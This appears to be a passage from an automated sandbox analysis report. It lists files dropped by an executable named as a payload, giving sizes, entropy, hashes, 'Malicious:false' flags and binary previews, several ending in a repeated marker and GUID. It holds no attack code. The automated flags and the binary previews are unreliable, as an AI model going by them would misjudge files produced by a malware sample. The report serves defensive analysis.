                                                                                                Preview:<?xml.k.H..Z.G]..S-..%..0../........0......j.q.....nz..x=~sX...619........'.[......a.g.....B...[...K..k......Y...a;..m%..^}9g.."......N)...@...5.4.g0.1h..A....~v.M.].........<N....c(....:#..1....%..O.....q..v.P.4.$..;..={..].$'/..."...t.i.'...(A.Wi.(OI......U..v...q.iu..c...i...U...T3.}...Fj...}.V..9.....i._.S.....{..E5.F..h.....S.L..z.Y..=....=#.(M;....O.5..G. ...i..S..R..=Uvm.0....l..V+<Uv.7...n7e......V..t...Y..%...O..B._.3.+..T.w_.............l...._J.5N..Me....P....j.W.z..m";>.......q..e...7.......?.5#]RX...g1l.....P"z..;..[.(B..&J....j..h.o.....[.....h.........d.c*]_4..y... ....r.d..3..D..o2.....=.ry.S.z.M..w..w.......B.m'x.e..V..ZR.M...3...J...6......X.T.&..J~.W..3....~.Zu...R..uv#J...]-.m'\_.f......../....Z..O......'T.gC..O$.....@OJ1y..q.<..U....Z...z..J...5$..;..../8.t....^D.d.....x.k.u.(...q.K.fdJ:.5.3k..K.....*....az..<..K..#.j.8.R'.m..........*.B.+2P.UZc.h.3.[.....-il..w}.x..6...g..<.I;.a...+.@$j.CB.'\.Z..&.f...46Q.."...-..a
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):708
                                                                                                Entropy (8bit):7.684670147098442
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:9OhTL+wqN0ETynKyfW7VsiaaJPAbKSIdDogSGwxAw731vuuXCCRTYE5gJc3cii9a:9TwQ0+yKy+7mNCPAWSIdgFGwbduu7zxn
                                                                                                MD5:C3CC90952505E505D05BC43DEB2B0399
                                                                                                SHA1:1D1C5425EE76E26612633DA0FACCB8C4A30312CA
                                                                                                SHA-256:EB7B14962E4B481EA6455D5DE039EA66E3819027B29AFD2212206A4F75107F34
                                                                                                SHA-512:1B65640AF311260120327B7A8956642715F5F315A6332769DFD3A8827235400269816EB25886B1DB0634CCFFB699C8F8F906887C78FC1E0C7010867FAE52C0F8
                                                                                                Malicious:false
                                                                                                Preview:<?xml.-....q..G......PS.....<.2.R....*9A$=A....c..N..;gZ.^[.....).ok..]...%..&c.I#Y.-gY.....U...@dnz...A35[*.H.f6j\Ie.7.t..V...[...q...6..$.Azr..="K?r.e.J.....ge...\..OY...N,,.K..=.+..I%.. .,-3......e...2'wo..q.>B\Jm>....R....k[%.x.._....Q..:.Z.I..t..q.nD3.8......]......Y=....[.L...,$.........'..~..Z.E...;$..c.N.}...!8f..5.y_j.tDE(.R.6..1)...W+.=.D...n...9~^!..`J.G.....P.2..."...O..y%...|.!.T._.`...}.#..-....Q[..jm.vM..Q.XL.C!I?....%...3.......}......).....F..KG..X....J...C..N.....?..`.Q.u.H...hGB.sQ7..L..........c.......S1...(V.}x.j..Vq.'.....(:.=....@..a(..f~..rPG<8.K...\...A..J].....fL/2gu..p..)J..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1132
                                                                                                Entropy (8bit):7.792800290432868
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SvFXeQBiHVP1BBDJTQDvLdSMJPOk6kSqHu5ejomWZOeRrwEtfjnAx3bD:Vii1PLBRQjMCPF6kSqHmejhk/zwLD
                                                                                                MD5:960FAF61F298B927A83FEF842C6EEDF0
                                                                                                SHA1:3B415439948D9B220D5616CEEFC504D666A23CE9
                                                                                                SHA-256:39C4918F20E88C769F01A4B52FC189123776A7942797115E6418587D894B8090
                                                                                                SHA-512:2ECEBA4B45F43242EB6BAEA5C3C4F26CC72C4CD63A5F775C4189DADC46BF873F4885E8954C3512991B242E56E10C4FA122A21C342DC0172BDE0014151E0AB64D
                                                                                                Malicious:false
                                                                                                Preview:<?xml...x.....1...{g..'........i.z.Rt.3.....}}......G8..e..F...k.I...e.....CV...#.l@..M.u.O$..:b^f.....W{P.L#.7...*..9<..6.]..?.>.|.ggj....m).......}m...9x.2a...C..Rr.->N\7.....]...~D|. ..56..+...6..).$.S....w<\...".M...l=.SE..nj...:x.M..b2.X.pF..tU......=.E.I.."F..R..(..:2.S...o.7I.. ...S..m....s....c.k.A@Y......k.C..J.8.n,.g...3sB...:...v......{..,......)i....Q.%_...Q...k.-..o.....Z<..n.....t.t. .N..r......|v......S.9.^..d.<.;.*fn{....L...I0.....x.........3.%'w..`.b..s[...w..~.J:..`..eX...<p.A.o....Z.HS..s...h.'..6B...-..T.,...Pc)..T.0..#.!..\...Q...:;.Y.o_R.4EW....a._.....f.9E\......._.mv...k..T.n..E....x...F.!?.n.~........R.)OdFs?v.R..X..&Cx......(.......eA.B.mE.<...*.Q......6...G.....F.r...gp.L..2.k...:.L.s.W.^dU..fb2...'..=...TX.\...P.....e.....o.j~../...c.?.@.5._.?jP..0.....IO..6.,.....y..hP.....i...c(.7....U'..d.cxV..]..%*....SR...B=.^.|^5...x.p....Mf.A...$.H...B...Zv..1..%...y\.....1hgr.. ...j..v6.T...#../K....#.g)1T....3
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.659089031261117
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:G32wuEj4lb687a9X9p9+DFvSJZRapB9t3/AEys2NvtUOnQ4BVcYjWaoBaFlEQgJ4:NwuSwaVr9+DFvBnkZqOnQOVcYiqlEQxn
                                                                                                MD5:4D54A6C1A28CAA6CBBAD555696FC7EA1
                                                                                                SHA1:99A2F19F209387595191253DC6388D5ABA122809
                                                                                                SHA-256:55981FCA7291B66D5C6D3F0ED1409DE4D9672A2252AC05465F5C794AF2C88B5A
                                                                                                SHA-512:E714431BE08DBC4FA3B2F12F5B964670414E4C237FB5351FCFDF87D0A55A393BB52E4F6FDFE69AEA025EB61F6372C9E2D4CA457248F477011FE327AA4D7B4030
                                                                                                Malicious:false
                                                                                                Preview:<?xml.V..3...]..$]..E.0Z0.'.5.2.D.-...v.......A.........wR..RLh.-......f.E../vNP.......oD..lo..Y..10.|s..........\...1jVb.A.....R.Q.*_<3..YL.2e......%.@o;=...D!....=.....;M.|.a............A..._..n.+\.u;..2......Sr8.0.N.....O+...-_R.........^.ga.nK.......x.A...........9....0.+1].*...P...7.FM..#Y...........$..m..b.j.r...,..p..#...p.8.....2....x..`..&..#`.I....r..d.....t.6.f...sh....y..Wh..;.L..[N+.E..C.;.......~...G...P..........f.r.h.W...A....e._b.......[..xuZ...e.F.n....O+.c+F..y*UE.....o....HG0.8.Au.A.<".7....A.?6.D.*..s.m.;D.+ 0{...$.N.$-z...............xQ;.Mp.I......K...+.@.l..$...$.;...8.N..6..... ".W5..A..M....o....p..|%..O.GBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1094
                                                                                                Entropy (8bit):7.8022981419426145
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JcerECJHHFEPD/VMaLlsn2iw7HVa6vLIlRJg17McG1x3bD:JcerNHGDNMaRsns7HzsvIZGfLD
                                                                                                MD5:C485971F508E216413A8552653D6DBB5
                                                                                                SHA1:C367D9127E5274AE05121F03D93EF105057BEBE5
                                                                                                SHA-256:A75E77A1A1D23BB32FCFD132FFC1353B3795DBD7DA224085DCD408F85EC3E6D8
                                                                                                SHA-512:A178E0182003AF2B90D0573E6BA75179326F99E92546B006497C495A27972ECBBB09B6040C1C19F187D005B97530E049D2E64013D7A5E7658BD193C780735C63
                                                                                                Malicious:false
                                                                                                Preview:<?xmlT.4...T.k..in.......dJ..w......s.`.Oi2.V..w...l....x..;....A.;U.C^&.]...n^.C_k.U...>9.|... p...s.*....`.....U..=...(L......>g........%.)>...e#K8.)...`8.'..+.....:.....j*A.....m? H.c..L-A.....wM...89...[..d.B.p....".tC.......+..E.f.;.....2......Cf..=.K.3.N..B...JH.c".E..e.......0.h...E...hD....>3.w.S.'...v...E.....>T-..{...v....d|tV.....zTF#.V..0..+.D2.l.K..m.(.z9.|.[..7.....'|c.@.L../+#...B.w....d....2..X..z..Q..M...c.Q..{..%1<S....bgf.ek.]..u..6..#.n.Z...l2|.....2".y..&H.....H...}:.:N..Z3#......rq..jMu.....V|....*._!..+r.$.d........;.....+..nN.4;..*.l!CH..D.(...<..),..X......~9.U......$......k.....O|.]k.n(..5.?..\}.;..Lf&.I..}..L..v.l...'%.9..."......}.A.i).?.......]y.$.?Gy.{..J..=..K..o#e?..>.:.h. c....!q.....FN.}.N..c..|..g.....u..l...vm0...<........a.hT.|]...u.qka..@...P.....0*$f.$.}..iWM./.....c...`./3..uYa=-..R....k..FfNq.Ob;....N..r..V.8#...@..?.tPb.C2.....~.V^>...9,8....'...&|]...K6... ......n.i..;........i.............K.....8.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8095
                                                                                                Entropy (8bit):7.977730486585084
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:6HDKSCp24gKb1l7yy+3xuOaO6zkoGwcTbOtYyVQhhDsbX0s:c3Yg01l7yx3x9zaPYK
                                                                                                MD5:5AE7BE5AED7361FA047CF7EAE6A77EE7
                                                                                                SHA1:6FDFC9125048B4D08092FC8A800BC9E0ACDF5075
                                                                                                SHA-256:38F5D4E28B1C41DEC4D97E1D628E7EBE2EA72939C906D7E1BEDA1721DBA75262
                                                                                                SHA-512:A7142E9ADCB421E52C4D854F03782893B6287DA58AA394D4ADEF5B4BD57C020972222323CD49E73E8ACEE5D987BCB62D72CD8E5BF14CCD7FFFACC88E1174505C
                                                                                                Malicious:false
                                                                                                Preview:<?xml........UJ...P..^.d.p..s..-..U#.....z>.....I.W...5M. ..#..FE.y6@..S..M6..]Pp%$.3RL....w.3.v0...?.Hh.........\..).bw!.....=o0.(...}.C.lL.j.Q.Cb...8T.\./..B..wru....7.?...".b.R,h...........Gk...u...0}0.4.......7lb.c...R.D.`...I....oi}2...s.^dM...%...cw...-..`...$...'......u.wt......`....a.....Il...y6>.g%N....V....45..Y...>7x...3%. .....J..:..M......]..I..113%.+....k.4.t....[F?..p...|.4I...R}..b.lj.z.!..'.C/v..KOV+:...T+A.0s=.@..._.....[..S..?..=$.......*{...t...grX.......IF..W..,.}...}T. ~.HG.P?... .A..y..;/rP[.Wn.........J..Cwj..I.Yx..X.<...&....P..03..(3...<.....E......YJ.x.?`#.8..6...kv..n..4.....o.M,..^.VVK.S._R.E.6...F......l..@.3.....R..91:...i}..../C...c(..e..CV'$z..tP.I^.V...?j.....E`_.).R.S.k..,..r.K.=....]@...pvmh...j@zWz.U.;.l_....p+.~.?51.E....nKg.5.......\M.$.j....S.l|3......=.E..>mc2AfJ...P.......G...r& .yi1j...|..+..]..4..Fg.".|.r..O......XFf....).U....1....as.g.y../.m...9.A.R.....u......2..O.m....q....Uz`B.f...z{
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1047
                                                                                                Entropy (8bit):7.798559985011116
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Wmpdw/YhgaEw8/R5Wu0l5EXrrRhsENZXBx3bD:TCw+RWvE/Rhs2LLD
                                                                                                MD5:AB7153425E77947901504FE2170DB007
                                                                                                SHA1:EF8BFE4B79232D64C18BCE1144FCE9176EAA006D
                                                                                                SHA-256:AB060347A20C3030BBF1A59D1CD0D16025FC0E127B2F031949797F57EA1B2FFE
                                                                                                SHA-512:476D85BA337D85F45793BCF6B82EA8F4966AC7FC05B9FA4662ACEEFFAFE5B4B47204AB75413BA432E4E661036435CAFF41D41DBABF80F3FBFB9982CD353E8873
                                                                                                Malicious:false
                                                                                                Preview:<?xml>A.h.W..3a.E.j$[..|3-.........t.:.6...B........".m....$1.T.......G.|k..)(.......BoI.....jj(:.N....1...`..d.P .g&G.hT.e^.....Q...>.....|....y.|Y..#.,a..\..x%u..8X.f....)E..x....R....2qS..j.:.#...WO..|........O..k....Wq'...Pv.^"e...@T.9."-.h..E..|gGP....\B.b...k....C...k.=:...n..s)#.0^U..H].....k.RE)7.M|E.aP...9.k.......".X.4|.1..<'....Gr@kz..u1<..9.....JG?....t.nM.......2....l*0...3..d...h.Q-.:...b.D...:..L.Gj.#............CZ..M.].).....})).%QT....9.f...J.+.[R.c.c]Q.R6..)../.,......!.F......l..%..x....0.f.ty9W..kZ..H...S.42_X....`.{^..Y.l...c....t.z)[.{...x.4.fi..QtI.U..rdn.........%6....4[>1}........9.....VW.8..J)).\.wY.- <Z.I-.v......5.-#.6........:.~...U.<......y.\..l.....~.d...:.7....!4.v.K@ew.8....H?............sg.t.Ch...7.1.x...Z.k.H.'..m...g..`..+t.#^...4..6J.._....8V<...]........<.n.d...hr..'.b......g......i..$.I....U.C......u.f.5.1.....L.Z...D.;........&Hl.^.,C .2Z._...Q...3......-i.8.s....y_..i.YBUcuB8PRg0LNi380axIJs5BS8nCUdeo
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1003
                                                                                                Entropy (8bit):7.793958416126408
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BqDa4MRObj3tHVCHPmk1GudQ/Q5TOGcmdQ3X5x3bD:BqDa4MRObLCvROiiGriDLD
                                                                                                MD5:C8F0AEED00F6AE8CC9D0E8CD50A48CBB
                                                                                                SHA1:A36D5649A8CDF035C4AE7F79516DE96AD835B33D
                                                                                                SHA-256:914A244E331A3853B3953EA91A6DD78ECE8DE5E55FA5FE954EEF0DAB57A72175
                                                                                                SHA-512:90B91C7D8F4F918D872E571A511292AE1D035C4705429A262C310AB2EA99CB8AF5E2D4BD7EAC852F71785A87B6ECA101CD79030F241B93B07E808B1DCBCA9B51
                                                                                                Malicious:false
                                                                                                Preview:<?xmlg..%ru..XYGW.Nb..n..=.Gz{..J.Q.z...,CaU........~....$4..t.......d.*.?.b...t5z7S.x.&x..h~..Pk.......& ...|.......a(h...........un..+..M..fd...(.u.R...!.S).....mM..U.w..S.w.+F...........d.. ..i.?.O...$..L...l@:%..cch.c...,*$....].'.o........Sf.....y.$Z.TS....l..$9..^..1.....GG.........({...>.ch.....<./.An............>.~.....H.y..M.xX.Cv....W...S..b>.$.3.xs...,.}....=.E.F+.mfD=C.1bDT.0!....V....dN.d.eP.....qq..:............wF8.o<a!...S..S.v.-D.q.;.Y.z.m....#.I....@....U..5../..+.E.5sI..t......~.5....w..o.%.._..W.,..V7..K.eL].Z..`+..gK.%U]q..N,....Fk'W..k.....k...e...?.o......`...R.vL.8..5......2g.h.<>E...J5...\.V".:*.[o8H....ka..._O.[8...M..e.i\...P..c.De.iPt..^:....l._{.....N^.].5..+..)^....vA~.8...n.G.v~.I...#....^.k.m '..moPUF.C:.y.1..........1Q.)b......p.A....@...7.*$Cq.4Z.<..%.p...v..E.......~..TM....&G......N.r(...IY..P.....Xkh...cX....iN..coN^T.Y...!..T..{...K.sBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2980
                                                                                                Entropy (8bit):7.926636396875104
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:QX1NhCDf211kdaNzI38nmlpwZVOdWXZwRXlZyHYHaKxHgh8XkT5HBHkDX1bM3G7j:QX1NhCK11RNzIskdWXiR1U4HyGu5Hey2
                                                                                                MD5:E9F9305CE88E2A1CC98F63133B1C7D73
                                                                                                SHA1:8EC69AA244DD30C023B98319E520CC256CBD86A6
                                                                                                SHA-256:FB08B4F9A269426B235ECEC6314940091E65BD5D17C89DECAC14A0086E6C39CC
                                                                                                SHA-512:247C9F6A10850F08C7CAD4223AD5DC5C0AABAAA77F643DDB916068F464598792CAEA8B0FD18A357E7FDA4749C287D98B866270083560A524F43C36AA7E29638C
                                                                                                Malicious:false
                                                                                                Preview:<?xmlm..e..`..L..A.R.._..+Xn..j. ......o.(...... rA.bSt../~...0!!../.M.$..`g..5>.M.%q....;.j.)I.%.{Qo.C..@z.* .P1. .....!+.v..-..v...w.f..~I...\.Y<oZ..t......Y.3.X..a&.R......2..../N|+[...:..pNq..6[|......e.DM.Og.,P....N.i.q~...&(.............y..Ba.H.;"...Y..5.A..f8...._).;...m..j .wX....-...V~h~..=dZ...*"..2.&L....._.(a..0...|.^;F.~...8......\F.8..U^?,\0...O...z2.F.a.....ty.....3.?..?>.`.J....ou..A..u...,..A.\..Y.Y...6.....HcG.2Ju....ko...g..=.v./+.,..Hz.f..o.PK...b..a.Q..J.q..G..d...oD.............j;XY....e.U.x.....*........O.^m...wh....j..t.ws...........M.._..g..bAAI.%R?..7...aC8...}.}Rb.G8..9...9[:.....]..Z......)$c......Z8..w.$....!...[.x..K.....~...zr... .?.&.W...M..zV`}....#..f..~}l.0..1"Ac-...BST.m.aj...#^N........,f.-.....#..}.8.M'X.<..G...O.....;..u....7..mC..y..^..s.H..T.CW..........s'.._Sx.........CMx......[.y..N..g....3m......E..U.w/.+.....4.....1"..z.[SR......0.A.",-x..0..!@.mk...{.+..`..1;^-4..Lq.....w..i..|_&3CU.2G
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2672
                                                                                                Entropy (8bit):7.934417606815254
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MPyQKeBlTSl9FHlK/MhNzKoCwg0skmxAJwVMpWMpdXyHW+S9hLD:f/e/GTFRh9laLqGVMpLdXyMj
                                                                                                MD5:4D774541A6B1E2295B373C3CB39C6D2A
                                                                                                SHA1:8F2D14F192337D21244821FEFE327EBAC3FCD8B0
                                                                                                SHA-256:2A438E142F84381957432F667CA0ED95993FE22DD7BDB13C7B13F3846136E2F6
                                                                                                SHA-512:3FA9B8D36741AAFFFD696F188C44E0A33BC2F29C9808E4A31184BACDC4BCC37F75133C9FD2D94D8E242EDF273CFD0F2B87EEED11692540DEBC136CB6B6B6A5A5
                                                                                                Malicious:false
                                                                                                Preview:<?xml..P.uu.I.B.y..O....O...#x..s..Ea.....P....9......%t/..yT..._..a...7.B..j)2e..........O.y.....Wz._...M...!....6.V.2G.....I...O...5G.w...*.LV...,..J.m....]...Ma...tQ...."..>......M....K8JD97!M.Z.%Ou...q.a/iA.b_....D.kl..L......!..%......ZI......>.Nm.....I...^,f]k.Sm[....da../d.H0.U,.c.[.>...&V..F.<.)f..s.n-`Vk..1/...f\.....@..f<*k..j.r..e.6.Fye-~&.:..b..$1.D/.e......./.k+b...cc.B.?t.1.u.......U..Fx.@....G.o 4......0m.p.....qJ'/.....~.v......q.h.hg...Z.W.H......f..b..]..G......s..z4.FV... .....~.8j...Hr...#..9.v.4....T......C-.7`qp:.....6...!.*.3........i...R.....&.eM...j.......)ooD0x2.v..!.2........|0.].....f..,.z....i.k...|v..K...c.r\.....(+.[....._..Y...7..FJ7~.}..3.}..1...]%3..j....Y."..a.gpXi$.h|....8.Add...xr0.............~.T.V..8Tm.|.%.j..^..C...........T./..........(.........z}....2.3.\....c.j.*)*.0S..j....!.d............j.r..&.z...i...4U..rS......+7\]T...>...yj../..a..Q..N:....^...8...8.W..?.......e.F
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2762
                                                                                                Entropy (8bit):7.935976651288178
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:KZqIBHePnmvSF+YR4aMfQ/LZBpOZpfD7tl1czQ9uTRqMhcwBQXRWhdLD:KZvQyJCsS4ZpPZc0gqMhTBrn
                                                                                                MD5:C7241142598D1A4C587B22F2EF86A285
                                                                                                SHA1:31C5C8EAE507ED9D46E04C4E1A9818F61E554243
                                                                                                SHA-256:9805D67CA00E7A1E6DC1A6A00DD3BDB34A85309967D40B9434B20E6406EEF4C9
                                                                                                SHA-512:B59AED59C03AAAD167BD98D9765EC2907521FA53E5A9EF78EBB4DCC7766F82CCCCCCCF337EB3DB5D42851E724AE15F31673F84F36D47A7180EE1C6C9E509DDCE
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....M..'..qC..;Q.2.L.g....U..w.....R:.E....2\.`..(.kZ...I.w...g....*....z..&.@.|"Q..|.9=...8........(.C...}.;+.x1....)..)....|..D.]..F.H...Y..(a..NZ.U,...^_.x0......vZS.U..J.......+...`X......<..$...Y.p...|...C."=...0....'yn....o..s..w.........M...c.+Dn........:.<...#..u.U...!.....O....h.HA......q...7...@.Q.?s.3..I.5.!..?.es.....-/O....W~j.|z..nF.....T....8.b..'......}...].n+6..4.[3..p3..se......V.GA.j.....=.'....&p...{.V.6.q9...lx.3....hl.p>.77..-.i...iG....].;..~.g....W.&.W ._...V.-t... ..i..I...PZ..3.`......tV..Z...C..H.>.......A.<...R.G....+...3&..........!%.....+.........N#$.....8.....Y..[..X..=g%.t..........#......'..l......Y._.....3.O.[:...L.~S2C.6.9.N.-R~....a...;]N.\...qc.0k...._A(..F..i]...mS......p.g..........._. %....|..ad.....f..=O...l..;6....U....W.7....c.l...">...16..*.coV{z..Hq.WI....B.........Im.\#...9...G.x.....U....1.......3/?..Y.........92.*..K1.....?.....`#.\pjw.B.?.q.x$...Tn.=.....'...(..x.D..I..f#.r..1U..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):838
                                                                                                Entropy (8bit):7.736136460599224
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:eSjONdho4QFKOfPZYkOp6q0kb4kWK905x3bD:eSAjo4QFnPUV0kskZ0DLD
                                                                                                MD5:723D63F8CB95829C8B242C3DD2FA59C4
                                                                                                SHA1:B1C9F76E13773D9388705F63A3BCCB5E93D9C2E4
                                                                                                SHA-256:D7689FFE99D563A94FD0C3233A76F4B0DA68D49D1F5564399E7EE5D04D746676
                                                                                                SHA-512:5AC31F5F3B3EE5F6320700ABA604749F9DAE75276947BEE644A55966E7AC0F1DC79C3D7BB100054E90CA9963E87EBB5A38339D6F275C5DF5686665733A25741E
                                                                                                Malicious:false
                                                                                                Preview:<?xml{.r.T).#...C...6.i+.\`hq?.....b.?..dc...4?i/.2`....../.!..]Z^.._..42.2...5.X*(.Z..........y.v.0. w.c%..^..l...=..lo7k..D.Y.Rk..c4....$.(.l...%.=....N.6.Q..'W.'i90[...\Rd......R0...........h..~.[...a.(.("..e^...V..S.>.hM......e.3@ ....9..b...^$Q^Q...g_...W..~..+{Z...(.n4...n.bc....|..|....:.PSH..l..@.....@D.@U......GE..~-..s.I..8..z.H,.B..L......j..8H....^H4..+...0.s&..-.B.k.s.V.\....s....?4..=d..a.,.z.wm......:.h.D*..x._..Qjt*YN.l..+.....d.7.@.?.D....2...0.M.....yv nL.Qe?....R.A.i.l...5...E........>..R.....J...9B.q..Q...ZItQ...v2....z.....=v[.icX....{.(V.u.[.a........U.yl.)...........?5k=.......V.T..o.....q.........v1.A.n./7c.3..S.-#cq...l{.U..B..O.y.ttu.q_%......+n...5).)....v-.o>f4.\.X.!.1.k...P....F.c^!...V.mwWBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1010
                                                                                                Entropy (8bit):7.778853491637828
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:DALYHkijN9JctO5KMuPr9+Z/Lmw2nndAbX77J99x3bD:80HkAJcU5Yiaw2ndAP733LD
                                                                                                MD5:C1C85CF7EC124390DB5C4AA4A878653B
                                                                                                SHA1:3C6E514FB7AD9AD3DF6389E9C6FC4F2AFE0FAC3C
                                                                                                SHA-256:5840413C22FD6649F7F9654AAB2808151B6F3E07C642F999623A98451CAC5D6F
                                                                                                SHA-512:2EA976E9265132BA26DF9ABBFAC14B47B76DB5BA2C1AA8F786DFE97FAA3A3BE60D4B2B9CDC85F81785BE1D5FA58B0D43BF9B8167A4053F24D6051F8A5ACAE3B2
                                                                                                Malicious:false
                                                                                                Preview:<?xmlk...=s..vi..c....+.Biz.U..|.....E.."...|..{..N^.......N.2.....+..IyT.1O...|'...1|......!.t...5lg.z.......Q............b...u_.3.I.|ds....7.K.o....P..q.8....0...f..0...#.0.:N..L8..DJ..xo/....&....l..G...Dj........j!...V.j..M.9o...I]..Gm...A=.;.....E.{Hi.BGi.......j?+..M }.)l(..M ...#..../j...?...8U.)......E.ftb.B..U..Pw..5.8.d.^..................'...P..}.ed......9`>p|..<.Kw...P..5.....6...7T..R...............he....I...{{.5....o.q..39.....]... .....N.+...0q....t ....\oO^...+.;X$.......5...K...w....t[+]=!.)..e.az..3..z.m..4.^.Z.J...p..5.h......5......U.s..6|B.(Lh3...,...m...Ut...@...{I../&...YE..,...I..._.3.^M......Y..{A.+._...c0i.r.F..f!.=...q..._..M...7..OC..$<.BP.~*.....\....7.{z....i.>5;<..!"@.}s.7@a~.T..}..5.g.c.......#8.,w...9..c.:..M.k.4h.r.-.c.>..7t..O !...r.Y..v..Q..O...K.w.2.../>.@.....q.Z)=.B....KO....%...L..qZ=Y.{...%.............'.`xG ..`.q.~........BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1380
                                                                                                Entropy (8bit):7.842424083695527
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0AxUZHqT3VQaAhzxjT6SoNoufHGy2706iplRT7gxGyEA/8qsBC9s8DGrx1x3bD:0rqTlizxjT6SoNxHTBvCGyl0qZ9s+kfn
                                                                                                MD5:BC88017DB79421427F19121B0F92BCB8
                                                                                                SHA1:B7142DCF278AC85F26E8E0D0AAE7EA23B23A0074
                                                                                                SHA-256:95FD1C54ECB30917AFAD87C0D777014F567297713365BC1C00128AE2FFB38FD1
                                                                                                SHA-512:6FF875097804407228CD21F0F4395A92B025B23F5F5F7805AF70A8ED324FD9A795C5FE5171586F27581E9BE68340F62528E4C74DD4C9304BC37BFB7882BC38EB
                                                                                                Malicious:false
                                                                                                Preview:<?xml.[.~.S{..H;R3o.B..0Dj.$..q........LP<:....d.-7.>.i.5l1.%}H....<.`.[....G.5..]..}Y....... ...(.........%w.........I\..i]....Bg.Wr..l.A_.xL+.n.o.I.g/...$..;.R........m.......U.bfn.&..q......>.P>l[....p..n=.9..K...=..q^.w..&p....g;f.......>.8c.c..4J.".........x....`T>.}...d{`...m...P:.L..Y....BRa:.IL..j....#...).B.........^^w.$.l..I..V...=WO!HD...C_..-....w...`M...K.'...$...}.,.h..pB.{..2..c......[..n.].....#.......o..E{.$........DB....;...I...D0......^.W...&.?(...I...&j..............-..<-.O....w.....B...W$.*../YN.1o`eb.r9.I...d..+......L.`a.l*.q...e..."..[.$$Q..g!....Z.sD>s..l....(..>.n......-8....."h).r.........V[|.....v......-...,........'..p...../\.a.......B....y.t..].\$.......VZey.yq........q............i|...?f..,r...R.R..Rc.G%...-.=...v....]..ol].I.m...+.[.....z..c..lr..^,.....!'..._.F...F...[t......i.`...i....f.....!H.......S..z)....:N.4../.......d.-...]..hx.N..&y...$.4K..rp/...y&Q..*cm.._.....kl.s.....V.....o.l..q8yh..[a.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1614
                                                                                                Entropy (8bit):7.886684058057607
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:E+bGeejGugpOya8S+tqpcTls5ZQ7HshALC1H4IAJPl1mN2pyxKyDf3Flx3bD:E+kGBsyPRtMa6jKHshAvvP6N2pyoClLD
                                                                                                MD5:C97A5A01FA8D26B7FED59CB4F82D536F
                                                                                                SHA1:DBA73C1A92406A2F7BE9431547323A0ABE81DB5D
                                                                                                SHA-256:1636268469FABB574F6B876D96BAA9DBB12130CFCEB5D800F68A95C141E1D56B
